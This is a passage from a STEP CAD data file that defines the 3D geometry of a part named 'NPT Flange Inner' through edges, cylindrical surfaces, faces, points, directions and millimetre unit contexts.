DGE('',*,*,#321,.T.);\r\n#453=ORIENTED_EDGE('',*,*,#319,.T.);\r\n#454=ORIENTED_EDGE('',*,*,#300,.T.);\r\n#455=ORIENTED_EDGE('',*,*,#297,.F.);\r\n#456=ORIENTED_EDGE('',*,*,#318,.T.);\r\n#457=ORIENTED_EDGE('',*,*,#307,.F.);\r\n#458=ORIENTED_EDGE('',*,*,#309,.T.);\r\n#459=ORIENTED_EDGE('',*,*,#303,.F.);\r\n#460=ORIENTED_EDGE('',*,*,#305,.T.);\r\n#461=ORIENTED_EDGE('',*,*,#293,.F.);\r\n#462=ORIENTED_EDGE('',*,*,#296,.T.);\r\n#463=ORIENTED_EDGE('',*,*,#317,.T.);\r\n#464=CYLINDRICAL_SURFACE('',#505,5.);\r\n#465=CYLINDRICAL_SURFACE('',#522,5.);\r\n#466=CYLINDRICAL_SURFACE('',#525,1.);\r\n#467=CYLINDRICAL_SURFACE('',#528,1.);\r\n#468=CYLINDRICAL_SURFACE('',#531,1.);\r\n#469=CYLINDRICAL_SURFACE('',#534,1.);\r\n#470=CYLINDRICAL_SURFACE('',#537,0.5);\r\n#471=CYLINDRICAL_SURFACE('',#540,0.5);\r\n#472=CYLINDRICAL_SURFACE('',#543,0.5);\r\n#473=CYLINDRICAL_SURFACE('',#546,0.5);\r\n#474=CYLINDRICAL_SURFACE('',#549,10.);\r\n#475=CYLINDRICAL_SURFACE('',#552,57.);\r\n#476=CYLINDRICAL_SURFACE('',#554,20.);\r\n#477=ADVANCED_FACE('',(#32),#464,.T.);\r\n#478=ADVANCED_FACE('',(#33),#19,.T.);\r\n#479=ADVANCED_FACE('',(#34,#14),#20,.F.);\r\n#480=ADVANCED_FACE('',(#35),#465,.T.);\r\n#481=ADVANCED_FACE('',(#36),#21,.T.);\r\n#482=ADVANCED_FACE('',(#37),#466,.T.);\r\n#483=ADVANCED_FACE('',(#38),#22,.T.);\r\n#484=ADVANCED_FACE('',(#39),#467,.T.);\r\n#485=ADVANCED_FACE('',(#40),#23,.T.);\r\n#486=ADVANCED_FACE('',(#41),#468,.T.);\r\n#487=ADVANCED_FACE('',(#42),#24,.T.);\r\n#488=ADVANCED_FA
CE('',(#43),#469,.T.);\r\n#489=ADVANCED_FACE('',(#44),#25,.T.);\r\n#490=ADVANCED_FACE('',(#45),#470,.F.);\r\n#491=ADVANCED_FACE('',(#46),#26,.T.);\r\n#492=ADVANCED_FACE('',(#47),#471,.F.);\r\n#493=ADVANCED_FACE('',(#48),#27,.T.);\r\n#494=ADVANCED_FACE('',(#49),#472,.F.);\r\n#495=ADVANCED_FACE('',(#50),#28,.T.);\r\n#496=ADVANCED_FACE('',(#51),#473,.F.);\r\n#497=ADVANCED_FACE('',(#52),#29,.T.);\r\n#498=ADVANCED_FACE('',(#53,#15),#474,.F.);\r\n#499=ADVANCED_FACE('',(#54),#30,.T.);\r\n#500=ADVANCED_FACE('',(#55),#475,.T.);\r\n#501=ADVANCED_FACE('',(#56),#476,.T.);\r\n#502=ADVANCED_FACE('',(#57,#16),#31,.T.);\r\n#503=CLOSED_SHELL('',(#477,#478,#479,#480,#481,#482,#483,#484,#485,#486,\r\n#487,#488,#489,#490,#491,#492,#493,#494,#495,#496,#497,#498,#499,#500,#501,\r\n#502));\r\n#504=AXIS2_PLACEMENT_3D('placement',#708,#557,#558);\r\n#505=AXIS2_PLACEMENT_3D('',#709,#559,#560);\r\n#506=AXIS2_PLACEMENT_3D('',#712,#561,#562);\r\n#507=AXIS2_PLACEMENT_3D('',#716,#564,#565);\r\n#508=AXIS2_PLACEMENT_3D('',#718,#567,#568);\r\n#509=AXIS2_PLACEMENT_3D('',#724,#572,#573);\r\n#510=AXIS2_PLACEMENT_3D('',#728,#575,#576);\r\n#511=AXIS2_PLACEMENT_3D('',#732,#578,#579);\r\n#512=AXIS2_PLACEMENT_3D('',#736,#581,#582);\r\n#513=AXIS2_PLACEMENT_3D('',#740,#584,#585);\r\n#514=AXIS2_PLACEMENT_3D('',#744,#587,#588);\r\n#515=AXIS2_PLACEMENT_3D('',#746,#589,#590);\r\n#516=AXIS2_PLACEMENT_3D('',#750,#592,#593);\r\n#517=AXIS2_PLACEMENT_3D('',#754,#595,#596);\r\n#518=AXIS2_PLACEMENT_3D('',#758,#598,#599);\r\n#519=AXIS2_PLACEMENT_3D('',#762,#601,#602);\r\n#520=AXIS2_PLACEMENT_3D('',#765,#604,#605);\r\n#521=AXIS2_PLACEMENT_3D('',#767,#606,#607);\r\n#522=AXIS2_PLACEMENT_3D('',#768,#608,#609);\r\n#523=AXIS2_PLACEMENT_3D('',#770,#610,#611);\r\n#524=AXIS2_PLACEMENT_3D('',#772,#613,#614);\r\n#525=AXIS2_PLACEMENT_3D('',#776,#617,#618);\r\n#526=AXIS2_PLACEMENT_3D('',#778,#619,#620);\r\n#527=AXIS2_PLACEMENT_3D('',#780,#622,#623);\r\n#528=AXIS2_PLACEMENT_3D('',#784,#626,#627);\r\n#529=AXIS2_PLACEMENT_3D('',#787,#628,#629);\r\n#530=AXIS2_PLACEMENT_3D('',#790,#632,#633);\r\n#531=AXIS2_PLACEMENT_3D('',#794,#636,#637);\r\n#532=AXIS2_PLACEMENT_3D('',#797,#638,#639);\r\n#533=AXIS2_PLACEMENT_3D('',#800,#642,#643);\r\n#534=AXIS2_PLACEMENT_3D('',#802,#645,#646);\r\n#535=AXIS2_PLACEMENT_3D('',#805,#647,#648);\r\n#536=AXIS2_PLACEMENT_3D('',#808,#651,#652);\r\n#537=AXIS2_PLACEMENT_3D('',#812,#655,#656);\r\n#538=AXIS2_PLACEMENT_3D('',#816,#658,#659);\r\n#539=AXIS2_PLACEMENT_3D('',#818,#661,#662);\r\n#540=AXIS2_PLACEMENT_3D('',#820,#664,#665);\r\n#541=AXIS2_PLACEMENT_3D('',#824,#667,#668);\r\n#542=AXIS2_PLACEMENT_3D('',#826,#670,#671);\r\n#543=AXIS2_PLACEMENT_3D('',#828,#673,#674);\r\n#544=AXIS2_PLACEMENT_3D('',#832,#676,#677);\r\n#545=AXIS2_PLACEMENT_3D('',#834,#679,#680);\r\n#546=AXIS2_PLACEMENT_3D('',#836,#682,#683);\r\n#547=AXIS2_PLACEMENT_3D('',#839,#685,#686);\r\n#548=AXIS2_PLACEMENT_3D('',#840,#687,#688);\r\n#549=AXIS2_PLACEMENT_3D('',#842,#690,#691);\r\n#550=AXIS2_PLACEMENT_3D('',#844,#692,#693);\r\n#551=AXIS2_PLACEMENT_3D('',#845,#694,#695);\r\n#552=AXIS2_PLACEMENT_3D('',#847,#697,#698);\r\n#553=AXIS2_PLACEMENT_3D('',#849,#699,#700);\r\n#554=AXIS2_PLACEMENT_3D('',#851,#702,#703);\r\n#555=AXIS2_PLACEMENT_3D('',#852,#704,#705);\r\n#556=AXIS2_PLACEMENT_3D('',#853,#706,#707);\r\n#557=DIRECTION('axis',(0.,0.,1.));\r\n#558=DIRECTION('refdir',(1.,0.,0.));\r\n#559=DIRECTION('center_axis',(0.,0.,1.));\r\n#560=DIRECTION('ref_axis',(-0.707106781186547,-0.707106781186547,0.));\r\n#561=DIRECTION('center_axis',(0.,0.,-1.));\r\n#562=DIRECTION('ref_axis',(-0.7
07106781186547,-0.707106781186547,0.));\r\n#563=DIRECTION('',(0.,0.,-1.));\r\n#564=DIRECTION('center_axis',(0.,0.,1.));\r\n#565=DIRECTION('ref_axis',(-0.707106781186547,-0.707106781186547,0.));\r\n#566=DIRECTION('',(0.,0.,1.));\r\n#567=DIRECTION('center_axis',(0.,-1.,0.));\r\n#568=DIRECTION('ref_axis',(1.,0.,0.));\r\n#569=DIRECTION('',(1.,0.,0.));\r\n#570=DIRECTION('',(0.,0.,-1.));\r\n#571=DIRECTION('',(1.,0.,0.));\r\n#572=DIRECTION('center_axis',(0.,0.,1.));\r\n#573=DIRECTION('ref_axis',(1.,0.,0.));\r\n#574=DIRECTION('',(0.,-1.,0.));\r\n#575=DIRECTION('center_axis',(0.,0.,1.));\r\n#576=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#577=DIRECTION('',(-1.,7.40148683083437E-16,0.));\r\n#578=DIRECTION('center_axis',(0.,0.,-1.));\r\n#579=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#580=DIRECTION('',(0.,-1.,0.));\r\n#581=DIRECTION('center_axis',(0.,0.,-1.));\r\n#582=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#583=DIRECTION('',(1.,3.70074341541718E-16,0.));\r\n#584=DIRECTION('center_axis',(0.,0.,1.));\r\n#585=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#586=DIRECTION('',(0.,-1.,0.));\r\n#587=DIRECTION('center_axis',(0.,0.,1.));\r\n#588=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#589=DIRECTION('center_axis',(0.,0.,1.));\r\n#590=DIRECTION('ref_axis',(1.,4.44089209850063E-16,0.));\r\n#591=DIRECTION('',(-3.86164530304403E-16,1.,0.));\r\n#592=DIRECTION('center_axis',(0.,0.,1.));\r\n#593=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#594=DIRECTION('',(1.,0.,0.));\r\n#595=DIRECTION('center_axis',(0.,0.,-1.));\r\n#596=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#597=DIRECTION('',(0.,1.,0.));\r\n#598=DIRECTION('center_axis',(0.,0.,-1.));\r\n#599=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#600=DIRECTION('',(-1.,0.,0.));\r\n#601=DIRECTION('center_axis',(0.,0.,1.));\r\n#602=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#603=DIRECTION('',(0.342020143325668,0.939692620785909,0.));\r\n#604=DIRECTION('center_axis',(0.,0.,1.));\r\n#605=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#606=DIRECTION('center_axis',(0.,0.,1.));\r\n#607=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#608=DIRECTION('center_axis',(0.,0.,1.));\r\n#609=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#610=DIRECTION('center_axis',(0.,0.,-1.));\r\n#611=DIRECTION('ref_axis',(0.573576436351046,-0.819152044288992,0.));\r\n#612=DIRECTION('',(0.,0.,1.));\r\n#613=DIRECTION('center_axis',(0.939692620785909,-0.342020143325668,0.));\r\n#614=DIRECTION('ref_axis',(0.342020143325668,0.939692620785909,0.));\r\n#615=DIRECTION('',(0.,0.,-1.));\r\n#616=DIRECTION('',(0.342020143325668,0.939692620785909,0.));\r\n#617=DIRECTION('center_axis',(0.,0.,1.));\r\n#618=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#619=DIRECTION('center_axis',(0.,0.,-1.));\r\n#620=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#621=DIRECTION('',(0.,0.,1.));\r\n#622=DIRECTION('center_axis',(0.,1.,0.));\r\n#623=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#624=DIRECTION('',(0.,0.,-1.));\r\n#625=DIRECTION('',(-1.,0.,0.));\r\n#626=DIRECTION('center_axis',(0.,0.,1.));\r\n#627=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#628=DIRECTION('center_axis',(0.,0.,-1.));\r\n#629=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#630=DIRECTION('',(0.,0.,-1.));\r\n#631=DIRECTION('',(0.,0
.,1.));\r\n#632=DIRECTION('center_axis',(1.,3.86164530304402E-16,0.));\r\n#633=DIRECTION('ref_axis',(-7.105427357601E-16,1.,0.));\r\n#634=DIRECTION('',(0.,0.,1.));\r\n#635=DIRECTION('',(-3.86164530304403E-16,1.,0.));\r\n#636=DIRECTION('center_axis',(0.,0.,1.));\r\n#637=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#638=DIRECTION('center_axis',(0.,0.,-1.));\r\n#639=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#640=DIRECTION('',(0.,0.,-1.));\r\n#641=DIRECTION('',(0.,0.,1.));\r\n#642=DIRECTION('center_axis',(-1.,0.,0.));\r\n#643=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#644=DIRECTION('',(0.,-1.,0.));\r\n#645=DIRECTION('center_axis',(0.,0.,1.));\r\n#646=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#647=DIRECTION('center_axis',(0.,0.,-1.));\r\n#648=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#649=DIRECTION('',(0.,0.,-1.));\r\n#650=DIRECTION('',(0.,0.,1.));\r\n#651=DIRECTION('center_axis',(-1.,0.,0.));\r\n#652=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#653=DIRECTION('',(0.,-1.,0.));\r\n#654=DIRECTION('',(0.,0.,1.));\r\n#655=DIRECTION('center_axis',(0.,0.,1.));\r\n#656=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#657=DIRECTION('',(0.,0.,1.));\r\n#658=DIRECTION('center_axis',(0.,0.,1.));\r\n#659=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#660=DIRECTION('',(0.,0.,-1.));\r\n#661=DIRECTION('center_axis',(7.40148683083437E-16,1.,0.));\r\n#662=DIRECTION('ref_axis',(-1.,7.105427357601E-16,0.));\r\n#663=DIRECTION('',(-1.,7.40148683083437E-16,0.));\r\n#664=DIRECTION('center_axis',(0.,0.,1.));\r\n#665=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#666=DIRECTION('',(0.,0.,1.));\r\n#667=DIRECTION('center_axis',(0.,0.,1.));\r\n#668=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#669=DIRECTION('',(0.,0.,-1.));\r\n#670=DIRECTION('center_axis',(-1.,0.,0.));\r\n#671=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#672=DIRECTION('',(0.,-1.,0.));\r\n#673=DIRECTION('center_axis',(0.,0.,1.));\r\n#674=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#675=DIRECTION('',(0.,0.,1.));\r\n#676=DIRECTION('center_axis',(0.,0.,1.));\r\n#677=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#678=DIRECTION('',(0.,0.,-1.));\r\n#679=DIRECTION('center_axis',(0.,-1.,0.));\r\n#680=DIRECTION('ref_axis',(1.,0.,0.));\r\n#681=DIRECTION('',(1.,0.,0.));\r\n#682=DIRECTION('center_axis',(0.,0.,1.));\r\n#683=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#684=DIRECTION('',(0.,0.,1.));\r\n#685=DIRECTION('center_axis',(0.,0.,1.));\r\n#686=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#687=DIRECTION('center_axis',(1.,0.,0.));\r\n#688=DIRECTION('ref_axis',(0.,1.,0.));\r\n#689=DIRECTION('',(0.,1.,0.));\r\n#690=DIRECTION('center_axis',(0.,0.,1.));\r\n#691=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#692=DIRECTION('center_axis',(0.,0.,-1.));\r\n#693=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#694=DIRECTION('center_axis',(3.70074341541719E-16,-1.,0.));\r\n#695=DIRECTION('ref_axis',(1.,3.5527136788005E-16,0.));\r\n#696=DIRECTION('',(1.,3.70074341541718E-16,0.));\r\n#697=DIRECTION('center_axis',(0.,0.,1.));\r\n#698=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#699=DIRECTION('center_axis',(0.,0.,1.));\r\n#700=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#701=DIRECTION('',(0.,0.,1.));\r\n#702=DIRECTION('center_axis',(0.,0.,1.));\r\n#703=DIRECTION('ref_axis',(1.,4.44089209850063E
-16,0.));\r\n#704=DIRECTION('center_axis',(0.,0.,1.));\r\n#705=DIRECTION('ref_axis',(1.,4.44089209850063E-16,0.));\r\n#706=DIRECTION('center_axis',(0.,0.,1.));\r\n#707=DIRECTION('ref_axis',(1.,0.,0.));\r\n#708=CARTESIAN_POINT('',(0.,0.,0.));\r\n#709=CARTESIAN_POINT('Origin',(-52.,-53.,0.));\r\n#710=CARTESIAN_POINT('',(-52.,-58.,1.5));\r\n#711=CARTESIAN_POINT('',(-57.,-53.,1.5));\r\n#712=CARTESIAN_POINT('Origin',(-52.,-53.,1.5));\r\n#713=CARTESIAN_POINT('',(-57.,-53.,0.));\r\n#714=CARTESIAN_POINT('',(-57.,-53.,0.));\r\n#715=CARTESIAN_POINT('',(-52.,-58.,0.));\r\n#716=CARTESIAN_POINT('Origin',(-52.,-53.,0.));\r\n#717=CARTESIAN_POINT('',(-52.,-58.,0.));\r\n#718=CARTESIAN_POINT('Origin',(-57.,-58.,0.));\r\n#719=CARTESIAN_POINT('',(38.4989623089514,-58.,0.));\r\n#720=CARTESIAN_POINT('',(-57.,-58.,0.));\r\n#721=CARTESIAN_POINT('',(38.4989623089514,-58.,1.5));\r\n#722=CARTESIAN_POINT('',(38.4989623089514,-58.,0.));\r\n#723=CARTESIAN_POINT('',(-57.,-58.,1.5));\r\n#724=CARTESIAN_POINT('Origin',(-3.08188022298012,-12.3817096673894,0.));\r\n#725=CARTESIAN_POINT('',(-57.,-24.,0.));\r\n#726=CARTESIAN_POINT('',(-57.,-23.,0.));\r\n#727=CARTESIAN_POINT('',(-56.,-23.,0.));\r\n#728=CARTESIAN_POINT('Origin',(-56.,-24.,0.));\r\n#729=CARTESIAN_POINT('',(-51.5,-23.,0.));\r\n#730=CARTESIAN_POINT('',(-51.,-23.,0.));\r\n#731=CARTESIAN_POINT('',(-51.,-22.5,0.));\r\n#732=CARTESIAN_POINT('Origin',(-51.5,-22.5,0.));\r\n#733=CARTESIAN_POINT('',(-51.,-11.5,0.));\r\n#734=CARTESIAN_POINT('',(-51.,-11.,0.));\r\n#735=CARTESIAN_POINT('',(-51.5,-11.,0.));\r\n#736=CARTESIAN_POINT('Origin',(-51.5,-11.5,0.));\r\n#737=CARTESIAN_POINT('',(-56.,-11.,0.));\r\n#738=CARTESIAN_POINT('',(-57.,-11.,0.));\r\n#739=CARTESIAN_POINT('',(-57.,-10.,0.));\r\n#740=CARTESIAN_POINT('Origin',(-56.,-10.,0.));\r\n#741=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#742=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#743=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,0.));\r\n#744=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#745=CARTESIAN_POINT('',(55.,12.,0.));\r\n#746=CARTESIAN_POINT('Origin',(35.,12.,0.));\r\n#747=CARTESIAN_POINT('',(55.,-9.99999999999996,0.));\r\n#748=CARTESIAN_POINT('',(55.,-11.,0.));\r\n#749=CARTESIAN_POINT('',(54.,-11.,0.));\r\n#750=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,0.));\r\n#751=CARTESIAN_POINT('',(52.5,-11.,0.));\r\n#752=CARTESIAN_POINT('',(52.,-11.,0.));\r\n#753=CARTESIAN_POINT('',(52.,-11.5,0.));\r\n#754=CARTESIAN_POINT('Origin',(52.5,-11.5,0.));\r\n#755=CARTESIAN_POINT('',(52.,-22.5,0.));\r\n#756=CARTESIAN_POINT('',(52.,-23.,0.));\r\n#757=CARTESIAN_POINT('',(52.5,-23.,0.));\r\n#758=CARTESIAN_POINT('Origin',(52.5,-22.5,0.));\r\n#759=CARTESIAN_POINT('',(53.310810192575,-23.,0.));\r\n#760=CARTESIAN_POINT('',(54.7389581993171,-23.,0.));\r\n#761=CARTESIAN_POINT('',(54.2505028133609,-24.3420201433256,0.));\r\n#762=CARTESIAN_POINT('Origin',(53.310810192575,-24.,0.));\r\n#763=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,0.));\r\n#764=CARTESIAN_POINT('',(42.,-58.,0.));\r\n#765=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,0.));\r\n#766=CARTESIAN_POINT('',(10.,1.22464679914735E-15,0.));\r\n#767=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#768=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,0.));\r\n#769=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,1.5));\r\n#770=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,1.5));\r\n#771=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,0.));\r\n#772=CARTESIAN_POINT('Origin',(42.,-58.,0.));\r\n#773=CARTESIAN_POINT('',(54.2505028133609,-24.3420201433256,1.5));\r\n#774=CARTESIAN_PO
INT('',(54.2505028133609,-24.3420201433256,0.));\r\n#775=CARTESIAN_POINT('',(42.,-58.,1.5));\r\n#776=CARTESIAN_POINT('Origin',(53.310810192575,-24.,0.));\r\n#777=CARTESIAN_POINT('',(53.310810192575,-23.,1.5));\r\n#778=CARTESIAN_POINT('Origin',(53.310810192575,-24.,1.5));\r\n#779=CARTESIAN_POINT('',(53.310810192575,-23.,0.));\r\n#780=CARTESIAN_POINT('Origin',(54.7389581993171,-23.,0.));\r\n#781=CARTESIAN_POINT('',(52.5,-23.,1.5));\r\n#782=CARTESIAN_POINT('',(52.5,-23.,0.));\r\n#783=CARTESIAN_POINT('',(54.7389581993171,-23.,1.5));\r\n#784=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,0.));\r\n#785=CARTESIAN_POINT('',(55.,-9.99999999999996,1.5));\r\n#786=CARTESIAN_POINT('',(54.,-11.,1.5));\r\n#787=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,1.5));\r\n#788=CARTESIAN_POINT('',(54.,-11.,0.));\r\n#789=CARTESIAN_POINT('',(55.,-9.99999999999996,0.));\r\n#790=CARTESIAN_POINT('Origin',(55.,-11.,0.));\r\n#791=CARTESIAN_POINT('',(55.,12.,1.5));\r\n#792=CARTESIAN_POINT('',(55.,12.,0.));\r\n#793=CARTESIAN_POINT('',(55.,-11.,1.5));\r\n#794=CARTESIAN_POINT('Origin',(-56.,-24.,0.));\r\n#795=CARTESIAN_POINT('',(-57.,-24.,1.5));\r\n#796=CARTESIAN_POINT('',(-56.,-23.,1.5));\r\n#797=CARTESIAN_POINT('Origin',(-56.,-24.,1.5));\r\n#798=CARTESIAN_POINT('',(-56.,-23.,0.));\r\n#799=CARTESIAN_POINT('',(-57.,-24.,0.));\r\n#800=CARTESIAN_POINT('Origin',(-57.,-23.,0.));\r\n#801=CARTESIAN_POINT('',(-57.,-23.,1.5));\r\n#802=CARTESIAN_POINT('Origin',(-56.,-10.,0.));\r\n#803=CARTESIAN_POINT('',(-56.,-11.,1.5));\r\n#804=CARTESIAN_POINT('',(-57.,-10.,1.5));\r\n#805=CARTESIAN_POINT('Origin',(-56.,-10.,1.5));\r\n#806=CARTESIAN_POINT('',(-57.,-10.,0.));\r\n#807=CARTESIAN_POINT('',(-56.,-11.,0.));\r\n#808=CARTESIAN_POINT('Origin',(-57.,0.,0.));\r\n#809=CARTESIAN_POINT('',(-57.,0.,1.5));\r\n#810=CARTESIAN_POINT('',(-57.,0.,1.5));\r\n#811=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#812=CARTESIAN_POINT('Origin',(-51.5,-22.5,0.));\r\n#813=CARTESIAN_POINT('',(-51.5,-23.,1.5));\r\n#814=CARTESIAN_POINT('',(-51.5,-23.,0.));\r\n#815=CARTESIAN_POINT('',(-51.,-22.5,1.5));\r\n#816=CARTESIAN_POINT('Origin',(-51.5,-22.5,1.5));\r\n#817=CARTESIAN_POINT('',(-51.,-22.5,0.));\r\n#818=CARTESIAN_POINT('Origin',(-51.,-23.,0.));\r\n#819=CARTESIAN_POINT('',(-51.,-23.,1.5));\r\n#820=CARTESIAN_POINT('Origin',(-51.5,-11.5,0.));\r\n#821=CARTESIAN_POINT('',(-51.,-11.5,1.5));\r\n#822=CARTESIAN_POINT('',(-51.,-11.5,0.));\r\n#823=CARTESIAN_POINT('',(-51.5,-11.,1.5));\r\n#824=CARTESIAN_POINT('Origin',(-51.5,-11.5,1.5));\r\n#825=CARTESIAN_POINT('',(-51.5,-11.,0.));\r\n#826=CARTESIAN_POINT('Origin',(-51.,-11.,0.));\r\n#827=CARTESIAN_POINT('',(-51.,-11.,1.5));\r\n#828=CARTESIAN_POINT('Origin',(52.5,-11.5,0.));\r\n#829=CARTESIAN_POINT('',(52.5,-11.,1.5));\r\n#830=CARTESIAN_POINT('',(52.5,-11.,0.));\r\n#831=CARTESIAN_POINT('',(52.,-11.5,1.5));\r\n#832=CARTESIAN_POINT('Origin',(52.5,-11.5,1.5));\r\n#833=CARTESIAN_POINT('',(52.,-11.5,0.));\r\n#834=CARTESIAN_POINT('Origin',(52.,-11.,0.));\r\n#835=CARTESIAN_POINT('',(52.,-11.,1.5));\r\n#836=CARTESIAN_POINT('Origin',(52.5,-22.5,0.));\r\n#837=CARTESIAN_POINT('',(52.,-22.5,1.5));\r\n#838=CARTESIAN_POINT('',(52.,-22.5,0.));\r\n#839=CARTESIAN_POINT('Origin',(52.5,-22.5,1.5));\r\n#840=CARTESIAN_POINT('Origin',(52.,-23.,0.));\r\n#841=CARTESIAN_POINT('',(52.,-23.,1.5));\r\n#842=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#843=CARTESIAN_POINT('',(10.,1.22464679914735E-15,1.5));\r\n#844=CARTESIAN_POINT('Origin',(0.,0.,1.5));\r\n#845=CARTESIAN_POINT('Origin',(-57.,-11.,0.));\r\n#846=CARTESIAN_POINT('',(-57.,-11.,1.5));\r\n#847=CARTESIAN
_POINT('Origin',(0.,0.,0.));\r\n#848=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,1.5));\r\n#849=CARTESIAN_POINT('Origin',(0.,0.,1.5));\r\n#850=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,0.));\r\n#851=CARTESIAN_POINT('Origin',(35.,12.,0.));\r\n#852=CARTESIAN_POINT('Origin',(35.,12.,1.5));\r\n#853=CARTESIAN_POINT('Origin',(-3.08188022298012,-12.3817096673894,1.5));\r\n#854=UNCERTAINTY_MEASURE_WITH_UNIT(LENGTH_MEASURE(0.01),#858,\r\n'DISTANCE_ACCURACY_VALUE',\r\n'Maximum model space distance between geometric entities at asserted c\r\nonnectivities');\r\n#855=UNCERTAINTY_MEASURE_WITH_UNIT(LENGTH_MEASURE(1.E-6),#858,\r\n'DISTANCE_ACCURACY_VALUE',\r\n'Maximum model space distance between geometric entities at asserted c\r\nonnectivities');\r\n#856=(\r\nGEOMETRIC_REPRESENTATION_CONTEXT(3)\r\nGLOBAL_UNCERTAINTY_ASSIGNED_CONTEXT((#854))\r\nGLOBAL_UNIT_ASSIGNED_CONTEXT((#858,#861,#859))\r\nREPRESENTATION_CONTEXT('','3D')\r\n);\r\n#857=(\r\nGEOMETRIC_REPRESENTATION_CONTEXT(3)\r\nGLOBAL_UNCERTAINTY_ASSIGNED_CONTEXT((#855))\r\nGLOBAL_UNIT_ASSIGNED_CONTEXT((#858,#861,#859))\r\nREPRESENTATION_CONTEXT('','3D')\r\n);\r\n#858=(\r\nLENGTH_UNIT()\r\nNAMED_UNIT(*)\r\nSI_UNIT(.MILLI.,.METRE.)\r\n);\r\n#859=(\r\nNAMED_UNIT(*)\r\nSI_UNIT($,.STERADIAN.)\r\nSOLID_ANGLE_UNIT()\r\n);\r\n#860=DIMENSIONAL_EXPONENTS(0.,0.,0.,0.,0.,0.,0.);\r\n#861=(\r\nCONVERSION_BASED_UNIT('degree',#863)\r\nNAMED_UNIT(#860)\r\nPLANE_ANGLE_UNIT()\r\n);\r\n#862=(\r\nNAMED_UNIT(*)\r\nPLANE_ANGLE_UNIT()\r\nSI_UNIT($,.RADIAN.)\r\n);\r\n#863=PLANE_ANGLE_MEASURE_WITH_UNIT(PLANE_ANGLE_MEASURE(0.01745329252),#862);\r\n#864=SHAPE_DEFINITION_REPRESENTATION(#865,#866);\r\n#865=PRODUCT_DEFINITION_SHAPE('',$,#868);\r\n#866=SHAPE_REPRESENTATION('',(#504),#856);\r\n#867=PRODUCT_DEFINITION_CONTEXT('part definition',#872,'design');\r\n#868=PRODUCT_DEFINITION('NPT Flange Inner','NPT Flange Inner',#869,#867);\r\n#869=PRODUCT_DEFINITION_FORMATION('',$,#874);\r\n#870=PRODUCT_RELATED_PRODUCT_CATEGORY('NPT Flange Inner',\r\n'NPT Flange Inner',(#874));\r\n#871=APPLICATION_PROTOCOL_DEFINITION('international standard',\r\n'automotive_design',2009,#872);\r\n#872=APPLICATION_CONTEXT(\r\n'Core Data for Automotive Mechanical Design Process');\r\n#873=PRODUCT_CONTEXT('part definition',#872,'mechanical');\r\n#874=PRODUCT('NPT Flange Inner','NPT Flange 